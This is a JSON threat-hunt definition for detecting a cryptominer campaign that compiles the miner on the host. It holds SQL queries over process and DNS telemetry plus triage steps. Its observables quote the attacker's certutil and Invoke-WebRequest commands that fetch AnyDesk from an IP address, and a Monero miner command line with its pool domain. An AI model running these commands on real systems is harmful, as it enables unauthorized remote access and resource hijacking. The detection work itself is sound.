{
  "hunt": {
    "meta": {
      "tlp": "clear",
      "hunt": {
        "handoff": "promote-to-detection",
        "trigger": "intel-report",
        "methodology": "model-assisted",
        "applicability": "campaign-specific",
        "justification": "Cryptominers consume significant business resources and often serve as the payload for exploited web applications. Detecting on-host compilation finds adversaries who avoid static hash-based detections by building unique binaries per target."
      },
      "name": "On-Host Miner Compilation and Resource Hijacking",
      "type": "investigation",
      "labels": [
        "hunt",
        "attack.t1059.001",
        "attack.t1496",
        "attack.t1190",
        "attack.t1562.001"
      ],
      "series": {
        "slug": "the-not-so-silent-miner-threat-actor-compiles-cryptominer-on-the-endpoint",
        "index": 2,
        "title": "The Not So Silent Miner: Threat Actor Compiles Cryptominer on the Endpoint",
        "total": 2
      },
      "related": [
        {
          "hunt": "anydesk-deployment-rmm-abuse",
          "reason": "Rogue RMM deployment is a distinct persistence and access stage handled in a sibling hunt.",
          "relation": "out-of-scope-alternative"
        }
      ],
      "targets": {
        "hunter": {
          "name": "Hunt agent",
          "agent": true
        },
        "analyst": {
          "name": "Tier-2 analyst",
          "role": "analyst"
        },
        "endpoint": {
          "name": "Endpoint telemetry (hb_ surfaces)",
          "category": "endpoint",
          "telemetry": [
            "endpoint"
          ]
        }
      },
      "analysis": "A standard rule might flag gcc.exe, but this hunt pivots between the build context (user paths, specific builder strings) and the functional outcome (miner flags and pool traffic) to distinguish threats from legitimate developer work.",
      "coverage": [
        {
          "stage": "on-host-compilation",
          "steps": [
            "compiler-activity-lead"
          ],
          "status": "covered"
        },
        {
          "stage": "cryptomining-impact",
          "steps": [
            "miner-execution-search",
            "mining-dns-activity"
          ],
          "status": "covered"
        },
        {
          "stage": "magicinfo-exploitation",
          "reason": "Handled in an initial access hunt focused on web server logs.",
          "status": "out_of_scope"
        },
        {
          "stage": "anydesk-deployment",
          "reason": "Handled in a sibling hunt on rogue RMM software.",
          "status": "out_of_scope"
        },
        {
          "stage": "persistence-account-creation",
          "reason": "Belongs to another part of the 'The Not So Silent Miner: Threat Actor Compiles Cryptominer on the Endpoint' series.",
          "status": "out_of_scope"
        },
        {
          "stage": "defender-tampering",
          "reason": "Belongs to another part of the 'The Not So Silent Miner: Threat Actor Compiles Cryptominer on the Endpoint' series.",
          "status": "out_of_scope"
        }
      ],
      "scenario": {
        "stages": [
          {
            "name": "Samsung MagicINFO Exploitation",
            "slug": "magicinfo-exploitation",
            "tactic": "initial-access",
            "techniques": [
              "T1190"
            ],
            "observables": [
              "tomcat9.exe",
              "CVE-2025-4632",
              "Apache Tomcat service"
            ]
          },
          {
            "name": "AnyDesk RMM Installation",
            "slug": "anydesk-deployment",
            "tactic": "execution",
            "techniques": [
              "T1059.001"
            ],
            "observables": [
              "certutil -urlcache -split -f http://194.87.89.30:8899/anydesk.exe",
              "Invoke-WebRequest -Uri \"http://194.87.89.30:8899/anydesk.exe\"",
              "AnyDesk.exe --set-password",
              "194.87.89.30:8899",
              "C:\\ProgramData\\AnyDesk.exe"
            ]
          },
          {
            "name": "Local Account Creation",
            "slug": "persistence-account-creation",
            "tactic": "persistence",
            "techniques": [
              "T1059.001"
            ],
            "observables": [
              "oldadministrator",
              "net user creation"
            ]
          },
          {
            "name": "Defender Disablement",
            "slug": "defender-tampering",
            "tactic": "defense-evasion",
            "techniques": [
              "T1562.001"
            ],
            "observables": [
              "SystemSettingsAdminFlows.exe"
            ]
          },
          {
            "name": "On-Host Miner Compilation",
            "slug": "on-host-compilation",
            "tactic": "execution",
            "techniques": [
              "T1059.001"
            ],
            "observables": [
              "Silent XMR Miner Builder.exe",
              "csc.exe",
              "cvtres.exe",
              "donut.exe",
              "tcc.exe",
              "cc1.exe",
              "gcc.exe",
              "MinGW64 toolset"
            ]
          },
          {
            "name": "Cryptomining Impact",
            "slug": "cryptomining-impact",
            "tactic": "impact",
            "techniques": [
              "T1496"
            ],
            "observables": [
              "explorer.exe --cinit-find-x -B --algo=\"rx/0\"",
              "auto.c3pool.org:19999",
              "0d202e16408770e8b6cceb14e1e3e72946b154bf881d27fe33d0060315b30dd1"
            ]
          }
        ],
        "summary": "A threat actor exploited a known Samsung MagicINFO vulnerability (CVE-2025-4632) to gain initial access via the Apache Tomcat service. They established persistence by installing AnyDesk, creating a local administrator account, and disabling Microsoft Defender before using a builder to compile a Monero miner directly on the endpoint to avoid detection of pre-built binaries."
      },
      "severity": "high",
      "rationale": "Focus on servers running public-facing Java applications or content management systems like MagicINFO. Developer workstations may generate noise in the compiler query; focus triage on unusual parent processes.",
      "guardrails": {
        "claims": "no_unsupported",
        "evidence": "citation_required",
        "telemetry": "untrusted",
        "missing_data": "not_benign"
      },
      "hypothesis": "An adversary has compiled a custom Monero miner directly on an endpoint using .NET and C compilers before executing it as a system process to hijack compute resources.",
      "parameters": {
        "scope_hosts": {
          "from": {
            "ref": "analyst-defined",
            "kind": "manual",
            "observed": "2026-09-24"
          },
          "type": "list[host]",
          "default": [],
          "description": "Optional hostnames to focus the search; leave empty for fleet-wide."
        },
        "lookback_days": {
          "from": {
            "ref": "standard-lookback",
            "kind": "manual",
            "observed": "2026-09-24"
          },
          "type": "number",
          "default": "14",
          "description": "Days of history to examine."
        },
        "compiler_binaries": {
          "from": {
            "ref": "huntress-not-so-silent-miner",
            "kind": "article",
            "observed": "2026-09-24"
          },
          "type": "list[string]",
          "default": [
            "csc.exe",
            "cvtres.exe",
            "donut.exe",
            "tcc.exe",
            "cc1.exe",
            "gcc.exe"
          ],
          "description": "Filenames of compilers and .NET utilities used during the build phase."
        },
        "mining_pool_domains": {
          "from": {
            "ref": "huntress-not-so-silent-miner",
            "kind": "article",
            "observed": "2026-09-24"
          },
          "type": "list[domain]",
          "default": [
            "auto.c3pool.org",
            "c3pool.org",
            "monerohash.com"
          ],
          "description": "Mining pool domains identified in the research."
        }
      },
      "provenance": {
        "authors": [
          {
            "org": "huntbase.io",
            "name": "Huntbase hunt generation"
          }
        ],
        "generated": {
          "by": "huntbase-hunt-generation",
          "from": "https://www.huntress.com/blog/threat-actor-compiles-cryptominer",
          "gates": [
            "dry-run",
            "lint"
          ],
          "model": "hb_google/gemini-3-flash-preview"
        }
      },
      "references": [
        {
          "url": "https://www.huntress.com/blog/threat-actor-compiles-cryptominer",
          "name": "Huntress \u2014 The Not So Silent Miner: Threat Actor Compiles Cryptominer on the Endpoint"
        }
      ],
      "blind_spots": [
        {
          "id": "short-lived-compilers",
          "risk": "A minimalist compiler like TCC may finish its build in milliseconds, potentially failing to be logged by interval-based snapshots.",
          "stage": "on-host-compilation",
          "question": "Whether extremely fast compiler executions are dropped by the agent",
          "requires": "High-frequency process event logging"
        },
        {
          "id": "injected-process-args",
          "risk": "If the adversary injects the miner code into explorer.exe rather than launching it with flags, the process arguments surface will remain silent.",
          "stage": "cryptomining-impact",
          "question": "Whether the miner arguments are visible if the code is injected",
          "requires": "hb_process_activity with reliable command-line auditing"
        }
      ]
    },
    "name": "On-Host Miner Compilation and Resource Hijacking",
    "description": "This hunt identifies the high-entropy behavior of on-host compilation followed by resource hijacking. It looks for the use of SilentXMRMiner builders and associated compilers (csc.exe, tcc.exe, gcc.exe) in user-writable directories. The flow then correlates these build activities with subsequent process execution containing specific mining flags and rare DNS lookups to known mining pools like C3Pool."
  },
  "nodes": [
    {
      "id": "hypothesis",
      "type": "hypothesis",
      "label": "Hypothesis",
      "config": {
        "tags": [],
        "series": {
          "slug": "the-not-so-silent-miner-threat-actor-compiles-cryptominer-on-the-endpoint",
          "index": 2,
          "title": "The Not So Silent Miner: Threat Actor Compiles Cryptominer on the Endpoint",
          "total": 2
        },
        "coverage": [
          {
            "stage": "on-host-compilation",
            "steps": [
              "compiler-activity-lead"
            ],
            "status": "covered"
          },
          {
            "stage": "cryptomining-impact",
            "steps": [
              "miner-execution-search",
              "mining-dns-activity"
            ],
            "status": "covered"
          },
          {
            "stage": "magicinfo-exploitation",
            "reason": "Handled in an initial access hunt focused on web server logs.",
            "status": "out_of_scope"
          },
          {
            "stage": "anydesk-deployment",
            "reason": "Handled in a sibling hunt on rogue RMM software.",
            "status": "out_of_scope"
          },
          {
            "stage": "persistence-account-creation",
            "reason": "Belongs to another part of the 'The Not So Silent Miner: Threat Actor Compiles Cryptominer on the Endpoint' series.",
            "status": "out_of_scope"
          },
          {
            "stage": "defender-tampering",
            "reason": "Belongs to another part of the 'The Not So Silent Miner: Threat Actor Compiles Cryptominer on the Endpoint' series.",
            "status": "out_of_scope"
          }
        ],
        "rationale": "An adversary has compiled a custom Monero miner directly on an endpoint using .NET and C compilers before executing it as a system process to hijack compute resources.",
        "blind_spots": [
          {
            "id": "short-lived-compilers",
            "risk": "A minimalist compiler like TCC may finish its build in milliseconds, potentially failing to be logged by interval-based snapshots.",
            "stage": "on-host-compilation",
            "question": "Whether extremely fast compiler executions are dropped by the agent",
            "requires": "High-frequency process event logging"
          },
          {
            "id": "injected-process-args",
            "risk": "If the adversary injects the miner code into explorer.exe rather than launching it with flags, the process arguments surface will remain silent.",
            "stage": "cryptomining-impact",
            "question": "Whether the miner arguments are visible if the code is injected",
            "requires": "hb_process_activity with reliable command-line auditing"
          }
        ],
        "scoping_notes": "Focus on servers running public-facing Java applications or content management systems like MagicINFO. Developer workstations may generate noise in the compiler query; focus triage on unusual parent processes.",
        "beyond_detection": "A standard rule might flag gcc.exe, but this hunt pivots between the build context (user paths, specific builder strings) and the functional outcome (miner flags and pool traffic) to distinguish threats from legitimate developer work."
      }
    },
    {
      "id": "compiler-activity-lead",
      "type": "query",
      "label": "On-host compiler activity from user profiles",
      "config": {
        "dsl": "sqlite",
        "role": "triage",
        "source": "endpoint",
        "content": "SELECT device_hostname, process_name, process_path, process_cmd_line, parent_process_name, user_name, time FROM hb_process_activity WHERE ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND (instr(',' || '{{compiler_binaries}}' || ',', ',' || LOWER(process_name) || ',') > 0 OR LOWER(process_cmd_line) LIKE '%silent xmr%') AND (LOWER(process_path) LIKE '%\\\\users\\\\%' OR LOWER(parent_process_name) LIKE '%silent xmr%') AND time >= datetime('now', '-{{lookback_days}} days')",
        "surface": "hb_process_activity",
        "description": "Identify compilers being run from user-writable directories or associated with the Silent XMR builder project.",
        "expected_signal": "Multiple rows showing C compilers or .NET utilities running in a user Documents or ProgramData folder. Silence suggests no conspicuous on-host compilation occurred."
      },
      "parents": [
        {
          "id": "hypothesis"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "triage",
        "label": "On-host compiler activity from user profiles",
        "reads": [
          "device_hostname",
          "process_name",
          "process_path",
          "process_cmd_line",
          "parent_process_name",
          "user_name",
          "time"
        ],
        "source": "hb_process_activity",
        "target": "endpoint",
        "content": "SELECT device_hostname, process_name, process_path, process_cmd_line, parent_process_name, user_name, time FROM hb_process_activity WHERE ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND (instr(',' || '{{compiler_binaries}}' || ',', ',' || LOWER(process_name) || ',') > 0 OR LOWER(process_cmd_line) LIKE '%silent xmr%') AND (LOWER(process_path) LIKE '%\\\\users\\\\%' OR LOWER(parent_process_name) LIKE '%silent xmr%') AND time >= datetime('now', '-{{lookback_days}} days')",
        "silence": "not_evidence_of_absence",
        "expected": "Multiple rows showing C compilers or .NET utilities running in a user Documents or ProgramData folder. Silence suggests no conspicuous on-host compilation occurred.",
        "verified": "dry-run",
        "verified_at": "2026-09-25"
      }
    },
    {
      "id": "miner-execution-search",
      "type": "query",
      "label": "Miner command line patterns",
      "config": {
        "dsl": "sqlite",
        "role": "detection-candidate",
        "source": "endpoint",
        "content": "SELECT device_hostname, process_name, process_path, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_cmd_line) LIKE '%--cinit-find-x%' OR LOWER(process_cmd_line) LIKE '%--algo=%rx/0%' OR LOWER(process_cmd_line) LIKE '%--cpu-max-threads-hint%') AND time >= datetime('now', '-{{lookback_days}} days')",
        "surface": "hb_process_activity",
        "description": "Detect the actual cryptominer process by searching for specific Monero mining flags used in the report.",
        "expected_signal": "A process like explorer.exe running with explicit mining arguments. This is a high-confidence signal for resource hijacking."
      },
      "parents": [
        {
          "id": "compiler-activity-lead"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "detection-candidate",
        "label": "Miner command line patterns",
        "reads": [
          "device_hostname",
          "process_name",
          "process_path",
          "process_cmd_line",
          "user_name",
          "time"
        ],
        "source": "hb_process_activity",
        "target": "endpoint",
        "content": "SELECT device_hostname, process_name, process_path, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_cmd_line) LIKE '%--cinit-find-x%' OR LOWER(process_cmd_line) LIKE '%--algo=%rx/0%' OR LOWER(process_cmd_line) LIKE '%--cpu-max-threads-hint%') AND time >= datetime('now', '-{{lookback_days}} days')",
        "silence": "evidence_of_absence",
        "expected": "A process like explorer.exe running with explicit mining arguments. This is a high-confidence signal for resource hijacking.",
        "verified": "dry-run",
        "verified_at": "2026-09-25"
      }
    },
    {
      "id": "mining-dns-activity",
      "type": "query",
      "label": "Rare DNS lookups to mining pools",
      "config": {
        "dsl": "sqlite",
        "role": "baseline",
        "source": "endpoint",
        "content": "SELECT query_hostname, COUNT(DISTINCT device_hostname) AS host_count, MIN(time) AS first_seen FROM hb_dns_activity WHERE (instr(',' || '{{mining_pool_domains}}' || ',', ',' || LOWER(query_hostname) || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY query_hostname HAVING host_count <= 5 ORDER BY host_count ASC",
        "surface": "hb_dns_activity",
        "description": "Stack-count connections to known mining pools to isolate the beachhead host.",
        "expected_signal": "A host resolving a mining pool that few others in the fleet use."
      },
      "parents": [
        {
          "id": "compiler-activity-lead"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "baseline",
        "label": "Rare DNS lookups to mining pools",
        "reads": [
          "query_hostname",
          "device_hostname",
          "time"
        ],
        "source": "hb_dns_activity",
        "target": "endpoint",
        "content": "SELECT query_hostname, COUNT(DISTINCT device_hostname) AS host_count, MIN(time) AS first_seen FROM hb_dns_activity WHERE (instr(',' || '{{mining_pool_domains}}' || ',', ',' || LOWER(query_hostname) || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY query_hostname HAVING host_count <= 5 ORDER BY host_count ASC",
        "silence": "not_evidence_of_absence",
        "baseline": {
          "window": "{{lookback_days}}d",
          "compare": "first_seen"
        },
        "expected": "A host resolving a mining pool that few others in the fleet use.",
        "verified": "dry-run",
        "prevalence": {
          "by": "device_hostname",
          "key": [
            "query_hostname"
          ],
          "rare_below": 5
        },
        "verified_at": "2026-09-25"
      }
    },
    {
      "id": "agent-triage",
      "type": "analytic",
      "label": "Weigh build and mining evidence",
      "config": {
        "cite": "required",
        "tools": [
          "endpoint"
        ],
        "context": [
          "compiler-activity-lead",
          "miner-execution-search",
          "mining-dns-activity"
        ],
        "objective": "Determine if any host shows a transition from running builder tools in user folders to executing a process with mining arguments and connecting to mining pools.",
        "description": "Correlate the build phase with the resulting impact per host to settle the verdict.",
        "max_iterations": 5,
        "expected_signal": "A per-host verdict citing evidence from compilation activity, process flags, and network lookups.",
        "success_criteria": "A verdict of malicious, suspicious, or benign per host, citing specific rows from each query."
      },
      "parents": [
        {
          "id": "miner-execution-search",
          "kind": "merge"
        },
        {
          "id": "mining-dns-activity",
          "kind": "merge"
        }
      ]
    },
    {
      "id": "verdict-decision",
      "type": "checkpoint",
      "label": "Route on malicious activity",
      "config": {
        "fuzzy": true,
        "judge": "hunter",
        "question": "The agent triage verdict is malicious for at least one host based on confirmed mining command lines and build behavior.",
        "condition": "The agent triage verdict is malicious for at least one host based on confirmed mining command lines and build behavior.",
        "blind_spot": "short-lived-compilers",
        "confidence": "high",
        "description": "Direct the hunt based on the agent findings of resource hijacking.",
        "checkpoint_type": "mandatory"
      },
      "parents": [
        {
          "id": "agent-triage"
        }
      ]
    },
    {
      "id": "isolate-endpoint",
      "type": "action",
      "label": "Isolate compromised host",
      "config": {
        "target": "endpoint",
        "description": "Prevent further resource drainage and lateral movement.",
        "instructions": "Isolate the host from the network. Collect the suspected miner binary and builder artifacts from the identified user folder.",
        "action_approval": "required"
      },
      "parents": [
        {
          "id": "verdict-decision",
          "branch": "on_supports"
        }
      ]
    },
    {
      "id": "analyst-review",
      "type": "task",
      "label": "Analyst forensic review",
      "config": {
        "assignee": "analyst",
        "description": "Verify the agent's findings and identify the entry point.",
        "instructions": "Review the build artifacts and mining command lines. Check the same host for Samsung MagicINFO or Apache Tomcat processes to confirm the initial access vector."
      },
      "parents": [
        {
          "id": "verdict-decision",
          "branch": "default"
        },
        {
          "id": "verdict-decision",
          "branch": "on_unavailable"
        },
        {
          "id": "isolate-endpoint"
        }
      ]
    },
    {
      "id": "close-out",
      "type": "task",
      "label": "Close out hunt",
      "config": {
        "assignee": "analyst",
        "description": "Record findings and update detections.",
        "instructions": "If no malicious activity was found, record the negative result. If activity was confirmed, promote the miner-execution-search query to a standing detection rule."
      },
      "parents": [
        {
          "id": "verdict-decision",
          "branch": "on_refutes"
        }
      ]
    }
  ]
}